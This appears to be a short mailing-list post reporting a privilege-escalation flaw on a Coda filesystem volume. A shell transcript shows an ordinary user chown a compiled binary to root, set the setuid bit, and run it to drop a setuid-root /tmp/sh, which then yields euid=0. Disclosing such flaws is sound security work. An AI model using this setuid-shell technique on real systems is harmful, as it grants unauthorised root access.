what's up with this? done on a coda volume..
ensomnia:tmp {15} id
uid=1000(scott) gid=100(users) groups=100(users), 0(wheel)
ensomnia:tmp {16} gcc thing.c
ensomnia:tmp {17} ls -l a.out
-rwxr-xr-x 1 scott nobody 3512 Sep 11 11:48 a.out*
ensomnia:tmp {18} chown root a.out
ensomnia:tmp {19} chmod 4755 a.out
ensomnia:tmp {20} ls -l a.out
-rwsr-xr-x 1 root nobody 3512 Sep 11 11:48 a.out*
ensomnia:tmp {21} ls -l /tmp/sh
ls: /tmp/sh: No such file or directory
ensomnia:tmp {22} ./a.out
ensomnia:tmp {23} ls -l /tmp/sh
-r-sr-xr-x 1 root wheel 441536 Sep 11 11:52 /tmp/sh*
ensomnia:tmp {24} /tmp/sh
# id
uid=1000(scott) euid=0(root) gid=100(users) groups=100(users), 0(wheel)
# exit
--
[EMAIL PROTECTED]